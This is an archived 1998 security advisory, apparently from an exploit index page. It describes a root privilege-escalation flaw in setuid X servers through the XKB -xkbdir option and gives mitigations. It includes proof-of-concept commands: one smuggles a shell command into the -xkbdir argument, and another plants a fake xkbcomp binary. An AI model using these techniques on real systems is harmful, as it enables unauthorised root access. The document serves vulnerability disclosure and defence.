X11R6.3 based Xservers with the XKEYBOARD extension that are setuid can be exploited with the -xkbdir option
Pavel Kankovsky <email@example.com>
Those systems running a setuid X11R6.3-based Xserver with XKEYBOARD extension (R6.1 is also probably affected). The XFree86 servers that come with many Linux and *BSD distributions is a good example of this.
3 February 1998
Date: Tue, 3 Feb 1998 20:26:16 +0100
From: Pavel Kankovsky <firstname.lastname@example.org>
Subject: serious security problem in XKB
The Neverending Story of X11 Insecurity continues...
On a system where X11R6.3-based Xserver with XKEYBOARD extension (R6.1 is
probably affected too) is run in setuid or setgid enviroment (e.g. typical
XFree86 installation has XF86_* installed setuid root), local users can
exploit a "feature" of XKB implementation to execute arbitrary commands
with the extra privileges.
Quick vulnerability check:
$ Xserver -xkbdir ':;id > /tmp/I_WAS_HERE;'
[exit X server]
$ grep root /tmp/I_WAS_HERE && echo 'Gotcha!'
1. as usual chmod u-s,g-s all installed Xserver binaries (*)
2. use xdm or a SAFE and PARANOID wrapper to start Xserver
(*) and unsafe or not-paranoid-enough setuid/setgid wrappers
(current Debian wrapper falls into this category)
In fact, there are (at least) two distict problems in XKB implementation,
both related to the use of -xkbdir option.
1. xkbcomp is invoked using system() or popen()
any shell metacharacters included in -xkbdir argument are interpreted
[demonstrated by the "quick vulnerability check"]
2. a user supplied instance of xkbcomp is invoked
-xkbdir argument is used to build the path to the compiler
$ cat > /tmp/xkbcomp
id > /tmp/I_WAS_HERE
$ chmod a+x /tmp/xkbcomp
$ Xserver -xkbdir /tmp
[X server executes /tmp/xkbcomp]
--Pavel Kankovsky aka Peak [ Boycott Microsoft -- http://www.vcnet.com/bms ]
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces: